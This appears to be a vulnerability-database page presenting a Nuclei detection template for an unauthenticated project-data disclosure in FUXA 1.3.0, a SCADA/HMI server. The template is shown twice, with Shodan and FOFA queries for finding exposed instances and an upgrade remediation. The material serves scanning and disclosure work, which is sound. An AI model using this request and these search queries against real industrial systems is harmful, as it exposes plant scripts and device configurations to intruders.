FUXA 1.3.0 - Unauthenticated ICS/SCADA Project Data Disclosure

CVE-2026-47717

Early Release

Description

FUXA v1.3.0 exposes full SCADA/HMI project configuration via GET /api/project without authentication, even when secureEnabled is true. The secureFnc middleware auto-generates a valid guest JWT when no token is provided, bypassing authentication. Exposed data includes server-side scripts, device configs, HMI views, and alarm definitions.

Severity

High

CVSS Score

7.5

Affected Product

fuxa

Published Date

June 18, 2026

Template Author

pussycat0x

CVE-2026-47717.yaml

id: CVE-2026-47717

info:
  name: FUXA 1.3.0 - Unauthenticated ICS/SCADA Project Data Disclosure
  author: pussycat0x
  severity: high
  description: |
    FUXA v1.3.0 exposes full SCADA/HMI project configuration via GET /api/project without authentication, even when secureEnabled is true. The secureFnc middleware auto-generates
    a valid guest JWT when no token is provided, bypassing authentication. Exposed data includes server-side scripts, device configs, HMI views, and alarm definitions.
  remediation: |
    Upgrade to fuxa-server version 1.3.1 or later.
  reference:
    - https://github.com/advisories/GHSA-q3w6-q3hc-c5x6
    - https://www.miggo.io/vulnerability-database/cve/CVE-2026-47717
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-47717
    cwe-id: CWE-201
  metadata:
    verified: true
    max-request: 1
    vendor: frangoteam
    product: fuxa
    shodan-query: http.title:"FUXA"
    fofa-query: title="FUXA"
  tags: cve,cve2026,fuxa,ics,scada,unauth,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/project"

    headers:
      Accept: application/json

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(header, 'application/json')"
          - "contains_all(body, 'scripts','id')"
          - "contains_any(body, 'devices','hmi','alarms','views','variables')"
        condition: and
# digest: 4a0a00473045022100853ea4c609957debece67b2fc3148c60173859461932c19bfbe9ba86554f123602200c1f15818743db38b9b5bd80e58d3ef5c9501db1186143f4a489ae8ad1972ef1:922c64590222798bb761d5b6d8e72950

7.5Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE ID:

cve-2026-47717

CWE ID:

cwe-201

References

https://github.com/advisories/GHSA-q3w6-q3hc-c5x6 https://www.miggo.io/vulnerability-database/cve/CVE-2026-47717

Remediation Steps

Upgrade to fuxa-server version 1.3.1 or later.

Description

id: CVE-2026-47717

info:
  name: FUXA 1.3.0 - Unauthenticated ICS/SCADA Project Data Disclosure
  author: pussycat0x
  severity: high
  description: |
    FUXA v1.3.0 exposes full SCADA/HMI project configuration via GET /api/project without authentication, even when secureEnabled is true. The secureFnc middleware auto-generates
    a valid guest JWT when no token is provided, bypassing authentication. Exposed data includes server-side scripts, device configs, HMI views, and alarm definitions.
  remediation: |
    Upgrade to fuxa-server version 1.3.1 or later.
  reference:
    - https://github.com/advisories/GHSA-q3w6-q3hc-c5x6
    - https://www.miggo.io/vulnerability-database/cve/CVE-2026-47717
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-47717
    cwe-id: CWE-201
  metadata:
    verified: true
    max-request: 1
    vendor: frangoteam
    product: fuxa
    shodan-query: http.title:"FUXA"
    fofa-query: title="FUXA"
  tags: cve,cve2026,fuxa,ics,scada,unauth,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/project"

    headers:
      Accept: application/json

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(header, 'application/json')"
          - "contains_all(body, 'scripts','id')"
          - "contains_any(body, 'devices','hmi','alarms','views','variables')"
        condition: and
# digest: 4a0a00473045022100853ea4c609957debece67b2fc3148c60173859461932c19bfbe9ba86554f123602200c1f15818743db38b9b5bd80e58d3ef5c9501db1186143f4a489ae8ad1972ef1:922c64590222798bb761d5b6d8e72950

FUXA 1.3.0 - Unauthenticated ICS/SCADA Project Data Disclosure

Description

Severity

CVSS Score

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

FUXA 1.3.0 - Unauthenticated ICS/SCADA Project Data Disclosure

Description

Severity

CVSS Score

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps